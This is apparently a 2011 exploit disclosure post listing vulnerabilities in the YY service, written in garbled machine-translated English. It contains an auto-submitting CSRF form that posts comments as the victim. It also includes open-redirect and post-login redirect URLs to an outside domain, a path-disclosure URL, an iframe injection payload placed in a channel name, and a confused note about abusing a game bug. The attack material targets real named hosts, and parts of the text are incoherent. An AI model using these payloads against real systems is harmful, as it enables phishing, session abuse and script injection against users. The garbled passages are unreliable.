Multiple vulnerabilities in YY (url jump & CSRF & Path & XSS & night killing bug)
# Author: B0mbErM @ n
# Time: 2011-01-27
######################################## ########
#
[X] csrf message * available only when the cookie is valid. Capture action/category_id/uid. Other functions also have csrf
<Form name = "admin" action = "http://m.yy.com/zone/8666086/p_addComment.action" method = "POST" onSubmit = "return validate (this)"> <br>
<Input type = "text" name = "content" value = "content"> <br>
<Input type = "text" name = "reviewer_id" value = ""> <br> <input type = "text" name = "category_id" value = "17505496"> <br>
<Input type = "text" name = "uid" value = "17505496"> <br>
<Input type = "submit" value = "confirm to submit" name = "B1" class = "buttonface"> <br>
</Form> <br>
<Body onload = "javascript: document. forms [0]. submit ()"> </body>
#
######################################## ########
#
[X] URL redirection
Jsp? Url = http://521.im "> http://udb.yy.com/logout.jsp? Url = http://521.im
#
######################################## ########
#
[X] URL jump after Logon
Http://gh.yy.duowan.com/auth/login.action? Redirect = http://521.im
#
######################################## ########
#
[X] explosive path
Http://hbb.yy.com/wp-admin/includes/admin.php
#
######################################## ########
#
[X] channel name <iframe src = http://521.im> open
Http://open.yy.com/fcg-bin/main.fcg? Module_name = control
#
######################################## ########
#
[X] murder night Bug
At the end of this round, when a man says something about making a video, he commits suicide with fear.
Only killer. No one can vote in the period of peace. The probability of this method is unstable, so use it with caution.
#
######################################## ########